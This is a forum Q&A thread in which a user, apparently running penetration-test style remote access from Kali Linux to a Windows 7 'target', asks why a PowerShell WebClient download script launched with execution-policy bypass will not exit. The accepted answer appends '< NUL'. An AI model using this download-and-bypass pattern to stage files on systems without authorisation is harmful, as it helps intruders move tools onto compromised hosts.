# Termination of Powershell within echo file

Tags: linux, windows, powershell

I'm working on executing powershell scripts through a remote command line and ran into the following issue...

Problem:
Need to transfer a file or more through an http connection...
Server: Kali Linux
Client: Windows 7

I have echo'd commands into a ps1 file and can execute the file as well through the command line but I cannot get the process to terminate after completion of transfer and return me to my target's cmd prompt...

ps1 is as follows:

```
$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://<IPAdressOfTarget>/<FileToGrab>"
$file = "<SavedName>"
$webclient.DownloadFile($url,$file)
```

Executed from the kali system with the following:

```
# powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File PowershellFileName.ps1
```

I have appended ***exit*** to the bottom of the file but no luck there...

***crtl*** + ***c*** is only way I'm finding to terminate which also terminates my remote access.

Any suggestions???

Answer (score 0, accepted):

Have you tried adding `< NUL` at the end of your call?

```
# powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File PowershellFileName.ps1 < NUL
```

Comment: Worked perfectly...Thx tmwoods!

Comment: No problemo @BlacklabsSecurity :)